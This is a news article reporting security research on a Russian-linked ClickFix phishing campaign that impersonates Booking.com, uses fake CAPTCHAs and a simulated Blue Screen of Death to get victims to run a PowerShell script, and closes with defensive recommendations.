Russian hackers have crafted a new “ClickFix” social engineering campaign targeting Booking.com users, tricking victims into installing malware using fake CAPTCHAs and a simulated Blue Screen of Death.
-
Fake Booking.com emails are being used to launch a new ClickFix malware campaign targeting travelers.
-
Victims are tricked into running malicious scripts themselves, bypassing traditional security controls.
-
ClickFix attacks are evolving and resurfacing across trusted brands, with links to ransomware activity in 2025.
According to new research published by Securonix, the campaign appears to be a stealthy reboot of an earlier version seen months ago, with threat actors evolving their tactics to avoid detection and maintain long-term access.
Nicknamed “PHALT#BLYX,” the updated ClickFix campaign tricks victims into executing malicious PowerShell commands that silently fetch and execute remote code. This happens via multi-stages involving powershell, proj files and msbuild,” Securonix says.
With prices shown in euros and malware written in Russian, researchers believe a Kremlin-aligned threat actor focused primarily on European targets is behind this particular activity.
ClickFix is a social engineering technique that surged in 2025 by exploiting users’ familiarity with CAPTCHAs and verification prompts, tricking them into running malicious scripts themselves to deliver malware.
The method has been linked to multiple ransomware campaigns, including incidents affecting US public-sector organizations, according to the Center for Internet Security, which tracked several ClickFix campaigns throughout last year.
Luring victims during busy holiday travel season
The campaign begins with a phishing email that appears to be from Booking.com, alerting the recipient to a “cancelled reservation” from the online discount travel agency.
The cancelled reservation also “prominently displays” a significant financial charge – often over a thousand euros – creating “a sense of urgency and panic” for the victim to “investigate immediately,” the Securonix blog states.
If the recipient clicks the “See Details” link button to find out more, they are redirected to a fake Booking.com page that shows a deceptive “loading error,” prompting the user to click a fake refresh button.
What stands out in this campaign is how aggressively it exploits panic and combines that with financial pressure, trusted branding, and a fake system failure to push victims into bypassing safeguards themselves.
Securonix also notes that abusing the Booking.com brand is a well-known tactic among sophisticated threat actors.
“Threat actors have historically compromised hotel accounts to message guests directly, or send phishing emails to hotel owners via fake inquiries,” including tactics such as targeting hotels with special requests, such as allergies or other food restrictions.
What’s more, the phishing email and bogus Booking.com site (observed as low-house[.]com) are practically indistinguishable from the real site, mimicking the travel agency’s branding, color palette, logos, and font styles, the researchers say.
Clicking the fake refresh button triggers a fake “Blue Screen of Death” (BSOD) animation that then instructs the user how to “fix the issue.”
The “fix” involves tricking the victim into manually pasting "a malicious script into the Windows Run dialog," which executes the malware.
“This technique is particularly dangerous because it relies on the user’s own hands to bypass security controls that would normally block automated script execution,” Securonix says.
The malware then disables the user's Windows Defender, establishing a persistent presence and connecting to a Command and Control (C2) server run by the threat actor.
Combating ClickFix attacks
Securonix presents multiple recommendations to break the infection chain. These include increasing user awareness and educating hospitality employees on the “ClickFix” tactic and the dangers of pasting script code into the Windows Run dialog.
Researchers also suggest bolstering social engineering defenses. Be cautious when receiving emails claiming to be from Booking.com or other online hospitality services, especially those that make urgent financial demands.
Furthermore, users are urged to verify requests through official channels rather than clicking links.
Other actions geared towards defenders include monitoring systems for “Living off the Land” binaries and legitimate system binaries for unusual behavior, as well as monitoring for suspicious file type creation and enabling PowerShell Script Block Logging to capture and analyze the contents of executed scripts.
Researchers say the campaign highlights a broader trend toward “hands-on” social engineering attacks that rely on users to bypass protections themselves.
As ClickFix techniques continue to resurface in updated forms, defenders are likely to see similar lures reused across other trusted consumer platforms.
Earlier Cybernews coverage flagged ClickFix lures using fake Windows update screens to trick users into executing malicious code, showing how the technique continues to resurface with new twists across trusted brands and interfaces.
Unlock more exclusive Cybernews content on YouTube.
Your email address will not be published. Required fields are markedmarked